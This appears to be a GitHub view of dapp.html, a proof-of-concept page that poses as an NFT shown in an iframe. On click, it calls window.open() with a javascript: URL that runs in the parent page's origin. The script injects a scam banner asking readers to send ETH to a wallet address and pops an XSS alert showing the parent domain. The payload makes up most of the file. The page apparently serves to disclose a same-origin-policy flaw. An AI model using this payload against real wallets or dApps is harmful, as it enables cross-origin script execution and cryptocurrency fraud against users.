-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdapp.html
More file actions
39 lines (30 loc) · 1.26 KB
/
dapp.html
File metadata and controls
39 lines (30 loc) · 1.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<!doctype html>
<html>
<head>
<style>
html {
font-family: sans-serif;
}
h1 {
font-size: 1.4em;
}
</style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<h1>iframe on <span id="originOutput"></span></h1>
<p>
Tap/click this iframe, which will call window.open() with javascript: URL which executes in parent page context.
(Observe injected HTML in parent page, and potentially an alert() dialog)
</p>
<p>This is an nft shown through an iframe due to SOP the nfts should never get access to the parent domain </p>
<p><b>IN SOP WE TRUST</b></p>
<img src="https://agentjacker.github.io/kittycat.png">
<script>
document.getElementById('originOutput').innerText = window.location.origin;
document.body.addEventListener('click', function () {
window.open('javascript:var elem = document.createElement("p");elem.innerHTML = "<b><marquee>send your eth to 0x983C2d9302a31041bf3E342dDd420DDac122ccb6 to win a prize one time offer</marquee><p>Executed JS in parent origin: "+window.location.origin+"</b></p>"; document.body.append(elem);alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
});
</script>
</body>
</html>